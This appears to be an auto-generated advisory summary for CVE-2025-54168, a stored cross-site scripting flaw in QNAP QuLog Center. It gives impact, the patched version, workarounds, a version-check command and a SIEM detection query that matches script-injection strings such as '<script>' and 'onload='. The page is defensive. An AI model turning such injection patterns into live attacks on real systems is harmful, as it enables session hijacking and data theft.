CVE-2025-54168
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in QuLog Center allows authenticated attackers with administrator privileges to inject malicious scripts. When exploited, this can bypass security controls or access sensitive application data. Only systems running vulnerable versions of QuLog Center are affected.
💻 Affected Systems
- QNAP QuLog Center
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An attacker with compromised admin credentials could execute arbitrary JavaScript in the context of other users' sessions, potentially stealing session tokens, performing actions as other users, or accessing sensitive log data.
Likely Case
An attacker with legitimate or compromised admin access could inject malicious scripts that execute when other administrators view affected pages, potentially leading to session hijacking or data exfiltration.
If Mitigated
With proper access controls and input validation, the impact is limited to administrators who view maliciously crafted content, with minimal risk to regular users.
🎯 Exploit Status
Exploitation requires administrator credentials. The vulnerability is a classic stored XSS that can be exploited through the web interface.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: QuLog Center 1.8.2.923 (2025/08/27) and later
Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-25-42
Restart Required: Yes
Instructions:
1. Log into QNAP NAS admin interface. 2. Navigate to App Center. 3. Check for updates to QuLog Center. 4. Update to version 1.8.2.923 or later. 5. Restart QuLog Center service.
🔧 Temporary Workarounds
Restrict Admin Access
allLimit administrator accounts to only trusted personnel and implement strong authentication controls.
Web Application Firewall
allDeploy a WAF with XSS protection rules to block malicious script injection attempts.
🧯 If You Can't Patch
- Implement strict input validation and output encoding for all user-controllable inputs in QuLog Center interface
- Monitor administrator account activity for suspicious behavior and implement session timeouts
🔍 How to Verify
Check if Vulnerable:
Check QuLog Center version in QNAP App Center or via SSH: cat /etc/config/qpkg.conf | grep QuLogCenterCheck Version:
cat /etc/config/qpkg.conf | grep QuLogCenterVerify Fix Applied:
Verify version is 1.8.2.923 or higher and test XSS payloads in input fields are properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual administrator login patterns
- Multiple failed login attempts to admin accounts
- Suspicious POST requests to QuLog Center endpoints with script tags
Network Indicators:
- HTTP requests containing script injection patterns to QuLog Center URLs
- Unexpected outbound connections from QuLog Center server
SIEM Query:
source="*quLog*" AND (http_method=POST AND (uri="*quLog*" OR uri="*admin*") AND (content="*<script>*" OR content="*javascript:*" OR content="*onload=*"))